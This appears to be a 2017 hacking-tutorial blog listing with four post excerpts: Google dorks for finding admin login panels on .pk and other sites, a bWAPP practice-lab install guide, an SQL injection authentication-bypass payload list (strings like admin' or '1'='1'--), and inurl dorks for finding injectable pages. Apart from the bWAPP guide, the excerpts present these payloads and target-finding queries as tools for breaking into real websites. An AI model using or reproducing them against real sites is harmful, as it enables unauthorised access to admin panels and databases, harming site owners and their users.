Skip to main content

Posts

Showing posts from January, 2017

ADMIN BYPASS

        HOW TO BYPASS ADMIN PANEL                       i will tell how about Website Hacking using Admin Panel bypass method Okay let’s start, So we will first find the admin panels using Google Dorks,  google darks for finding vulnerable admin panel                        .pk admin login                       pk inurl /admin/login.aspx                       pk inurl /admin                       inurl admin login asp site pk                       admin login.asp india                       admin login.asp college                       admin login.asp                       pk5001z admin login                        inurl:admin/index.php                       inurl:administrator.php                       inurl:administrator.asp                       inurl:login.asp                       inurl:login.aspx                       inurl:login.php                       inurl:admin/index.php                       inurl:adminlogin.aspx  Once you got the admin panel,

BWAPP INSTALL

how to run bwapp on localhost bWAPP, or a buggy web application, is a free and open source deliberately insecure web application. It helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful penetration testing and ethical hacking projects. What makes bWAPP so unique? Well, it has over 100 web vulnerabilities! It covers all major known web bugs, including all risks from the OWASP Top 10 project. bWAPP is a PHP application that uses a MySQL database. It can be hosted on Linux/Windows but in this i have show you on Windows Download page of bwapp:- https://sourceforge.net/projects/bwapp/?source=typ_redirect   And Download the xampp from this page:- https://www.apachefriends.org/download.html After download both bwapp and xampp Unzip XAMPP within the C: Drive and install Run XAMPP to get to the control Panel Hit Start Apache Hit Start MySQL Unzip bWAPP, copy and its full contents

SQL Injection Admin panel Bypass

SQL Injection Authentication Bypass Cheat Sheet This list can be used by penetration testers when testing for SQL injection authentication bypass.A penetration tester can use it manually or through burp in order to automate the process.The creator of this list is Dr. Emin İslam TatlıIf (OWASP Board Member) or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin'

Google Dorks For SQL Injection

Google Dorks For SQL Injection Google Dorks For SQL Injection 1500+ google Dorks for sql injection. Definition of google dorks: Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site. allinurl:*.php?txtCodiInfo= inurl:read.php?= inurl:”ViewerFrame?Mode=” inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= i